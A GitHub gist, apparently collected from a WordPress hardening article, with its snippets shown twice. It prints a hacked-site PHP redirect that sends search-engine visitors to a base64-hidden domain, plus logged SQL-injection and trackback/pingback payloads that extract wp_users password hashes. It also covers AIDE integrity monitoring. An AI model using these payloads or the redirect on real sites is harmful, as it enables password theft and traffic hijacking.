aldolat/gist:8149012

## gistfile1.txt
<?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");

$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }

if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>< ?php

## gistfile10.txt
# BEGIN WordPress
<ifmodule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</ifmodule>
# END WordPress

## gistfile11.txt
<ifmodule mod_security.c>
<files async-upload.php>
SecFilterEngine Off
SecFilterScanPOST Off
</files>
</ifmodule>

## gistfile12.txt
POST: Array
(
[cookie] => wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;
)

## gistfile13.txt
HTTP_RAW_POST_DATA: <?xml version=”1.0″?>

<methodCall>

<methodName>system.multicall</methodName>

<params>

<param><value><array><data>

<value><struct>

<member><name>methodName</name><value><string>pingback.extensions.getPingbacks</string></value></member>

<member><name>params</name><value><array><data>

<value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>

</data></array></value></member></blockquote>

## gistfile2.txt
<value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10000%2Bord(substring(user_pass,1,1)),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>

## gistfile3.txt
URL: /wp-trackback.php?tb_id=1
POST: Array
(
[title] => 1
[url] => 1
[blog_name] => 1
[tb_id] => 666666\’
[1740009377] => 1
[496546471] => 1
)

## gistfile4.txt
URL: /wp-trackback.php?p=1
POST: Array
(
[url] => ekibastos
[title] => ekibastos
[excerpt] => ekibastos
[blog_name] => +AFw-\’)/*
[charset] => UTF-7
)

## gistfile5.txt
<meta name=”generator” content=”WordPress 2.5.1″ /> <!-- leave this for stats -->

## gistfile6.txt
<?xml version=”1.0″?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>k1b0rg’ icq: 76-86-20</string></value></param>
<param><value><string>http://ocaoimh.ie/?p=k1b0rg#ls</string></value></param>
<param><value><string>admin</string></value></param>
</params>
</methodCall>

## gistfile7.txt
apt-get install aide
vi /etc/aide/aide.conf.d/88_aide_web
/usr/sbin/aideinit

## gistfile8.txt
/home/web/ Checksums
!/home/www/logs/.*
!/home/web/public_html/wp-content/cache/.*
!/home/web/.*/htdocs/wp-content/cache/.*

## gistfile9.txt
GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1
GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1
	<?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");

	$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }

	if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>< ?php
	# BEGIN WordPress
	<ifmodule mod_rewrite.c>
	RewriteEngine On
	RewriteBase /
	RewriteCond %{REQUEST_FILENAME} !-f
	RewriteCond %{REQUEST_FILENAME} !-d
	RewriteRule . /index.php [L]
	</ifmodule>
	# END WordPress
	<ifmodule mod_security.c>
	<files async-upload.php>
	SecFilterEngine Off
	SecFilterScanPOST Off
	</files>
	</ifmodule>
	POST: Array
	(
	[cookie] => wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;
	)
	HTTP_RAW_POST_DATA: <?xml version=”1.0″?>

	<methodCall>

	<methodName>system.multicall</methodName>

	<params>

	<param><value><array><data>

	<value><struct>

	<member><name>methodName</name><value><string>pingback.extensions.getPingbacks</string></value></member>

	<member><name>params</name><value><array><data>

	<value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>

	</data></array></value></member></blockquote>
	URL: /wp-trackback.php?tb_id=1
	POST: Array
	(
	[title] => 1
	[url] => 1
	[blog_name] => 1
	[tb_id] => 666666\’
	[1740009377] => 1
	[496546471] => 1
	)
	URL: /wp-trackback.php?p=1
	POST: Array
	(
	[url] => ekibastos
	[title] => ekibastos
	[excerpt] => ekibastos
	[blog_name] => +AFw-\’)/*
	[charset] => UTF-7
	)
	<?xml version=”1.0″?>
	<methodCall>
	<methodName>pingback.ping</methodName>
	<params>
	<param><value><string>k1b0rg’ icq: 76-86-20</string></value></param>
	<param><value><string>http://ocaoimh.ie/?p=k1b0rg#ls</string></value></param>
	<param><value><string>admin</string></value></param>
	</params>
	</methodCall>
	apt-get install aide
	vi /etc/aide/aide.conf.d/88_aide_web
	/usr/sbin/aideinit
	/home/web/ Checksums
	!/home/www/logs/.*
	!/home/web/public_html/wp-content/cache/.*
	!/home/web/./htdocs/wp-content/cache/.